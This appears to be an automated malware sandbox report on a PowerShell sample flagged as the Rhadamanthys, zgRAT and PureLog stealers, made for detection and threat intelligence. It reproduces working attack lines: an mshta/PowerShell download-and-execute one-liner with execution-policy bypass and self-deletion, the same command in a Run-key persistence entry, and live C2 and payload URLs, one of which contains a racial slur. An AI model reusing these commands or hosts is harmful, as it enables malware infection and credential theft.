Edit tour

Windows Analysis Report
atomxml.ps1

Overview

General Information

Sample name:	atomxml.ps1
Analysis ID:	1585909
MD5:	b21f207101abbbb84b30dfffb68c53e5
SHA1:	7d93785d0f1e1eed991b1b8209acec8abbb5cedb
SHA256:	d82cadfdd5c7611fc25978f7c500de4bb32a11ef202bc972c83a0815e625da66
Tags:	bookingps1Spam-ITAuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, RHADAMANTHYS, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected RHADAMANTHYS Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Deletes itself after installation

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Powershell In Registry Run Keys

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

fontdrvhost.exe (PID: 4092 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)

RegSvcs.exe (PID: 7968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

fontdrvhost.exe (PID: 5808 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)

RegSvcs.exe (PID: 8000 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

dw20.exe (PID: 8096 cmdline: dw20.exe -x -s 912 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

RegSvcs.exe (PID: 8016 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

dw20.exe (PID: 8168 cmdline: dw20.exe -x -s 916 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 8044 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 8144 cmdline: dw20.exe -x -s 784 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 8072 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 5100 cmdline: dw20.exe -x -s 788 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

mshta.exe (PID: 6672 cmdline: C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 2936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7644 cmdline: "C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

mshta.exe (PID: 6500 cmdline: C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 5312 cmdline: "C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000011.00000003.2382423562.0000000003180000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000011.00000002.2383562069.00000000036E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000010.00000003.2375768763.0000000003450000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000002.2389547473.00000000053A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000002.2380719391.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.2426889440.00000000037E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7960	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 7968	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: fontdrvhost.exe PID: 5808	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.powershell.exe.26c39780000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.powershell.exe.26c39780000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.powershell.exe.26c39780000.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.powershell.exe.26c39780000.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x46d47:$s1: file:/// 0x46c31:$s2: {11111-22222-10009-11112} 0x46cd7:$s3: {11111-22222-50001-00000} 0x4481e:$s4: get_Module 0x44c66:$s5: Reverse 0x43fea:$s6: BlockCopy 0x43fda:$s7: ReadByte 0x46d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
16.3.fontdrvhost.exe.59a0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.fontdrvhost.exe.5780000.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.fontdrvhost.exe.5780000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.fontdrvhost.exe.5780000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6672, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, ProcessId: 2936, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6672, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, ProcessId: 2936, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", ProcessId: 7272, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(epd[2])[epd[0]](epd[1], 0, true);close();ncj=new ActiveXObject('Scripting.FileSystemObject');ncj.DeleteFile(WScript.ScriptFullName);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uplatistarlt-126

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: mshta "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(epd[2])[epd[0]](epd[1], 0, true);close();ncj=new ActiveXObject('Scripting.FileSystemObject');ncj.DeleteFile(WScript.ScriptFullName);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uplatistarlt-126

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1", ProcessId: 7272, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:55:19.139942+0100	2047905	1	A Network Trojan was detected	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	2047905	1	A Network Trojan was detected	192.168.2.4	49956	142.250.185.225	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:55:19.139942+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49956	142.250.185.225	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:55:17.966589+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49845	142.250.185.225	443	TCP
2025-01-08T13:55:19.139942+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:20.354888+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49867	185.166.143.48	443	TCP
2025-01-08T13:55:31.884881+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49945	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49956	142.250.185.225	443	TCP
2025-01-08T13:55:34.179749+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49964	185.166.143.48	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2382396689.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49964 version: TLS 1.2

Source:	Binary string: wkernel32.pdb source: fontdrvhost.exe, 00000010.00000003.2386308129.00000000058A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385925161.0000000005780000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: fontdrvhost.exe, 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: fontdrvhost.exe, 00000010.00000003.2382164781.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2384235325.0000000005970000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2384894357.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385208368.0000000005920000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2382164781.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2384235325.0000000005970000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fontdrvhost.exe, 00000010.00000003.2384894357.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385208368.0000000005920000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2386308129.00000000058A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385925161.0000000005780000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_f367fb30-4a6d-4729-a18a-0a24b90a8c50\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_598857dc-8512-453a-af65-151ce81ace18\

Source: Network traffic	Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.4:49857 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.4:49956 -> 142.250.185.225:443

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49845 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49867 -> 185.166.143.48:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49857 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49857 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49945 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49956 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49956 -> 142.250.185.225:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49964 -> 185.166.143.48:443

Source: global traffic	HTTP traffic detected: GET ///////nigger.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive
